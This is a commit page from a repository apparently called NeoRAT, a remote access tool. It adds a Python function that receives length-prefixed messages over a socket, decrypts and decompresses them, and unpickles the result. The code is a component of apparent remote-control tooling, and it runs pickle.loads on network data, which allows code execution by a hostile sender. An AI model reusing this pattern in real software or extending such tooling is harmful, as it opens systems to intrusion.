summaryrefslogtreecommitdiff
path: root/binary/data_handling/recv_data.py
diff options
context:
space:
mode:
authorAL-LCL <alvin@alvinhavel.com>2023-05-19 11:01:49 +0200
committerAL-LCL <alvin@alvinhavel.com>2023-05-19 11:01:49 +0200
commit20dbeb2f38684c65ff0a4b99012c161295708e88 (patch)
treea5b8445f55da2fbbb92443b68e9d7354a290c598 /binary/data_handling/recv_data.py
NeoRATHEADmain
Diffstat (limited to 'binary/data_handling/recv_data.py')
-rw-r--r--binary/data_handling/recv_data.py26
1 files changed, 26 insertions, 0 deletions
diff --git a/binary/data_handling/recv_data.py b/binary/data_handling/recv_data.py
new file mode 100644
index 0000000..a329532
--- /dev/null
+++ b/binary/data_handling/recv_data.py
@@ -0,0 +1,26 @@
+import pickle
+import zlib
+
+
+def recv_data(conn, settings, callback=None):
+ encryption, headersize = settings
+ mode = [True, 0, b'']
+
+ while True:
+ client_msg = conn.recv(81920)
+
+ if mode[0]:
+ mode[1] = int(client_msg[:headersize])
+ mode[0] = False
+
+ mode[2] += client_msg
+
+ if len(mode[2])-headersize == mode[1]:
+ decrypted_msg = encryption.do_decrypt(mode[2][headersize:])
+ decompressed_msg = zlib.decompress(decrypted_msg)
+ client_msg = pickle.loads(decompressed_msg)
+
+ if callback:
+ callback(conn, client_msg)
+
+ return client_msg \ No newline at end of file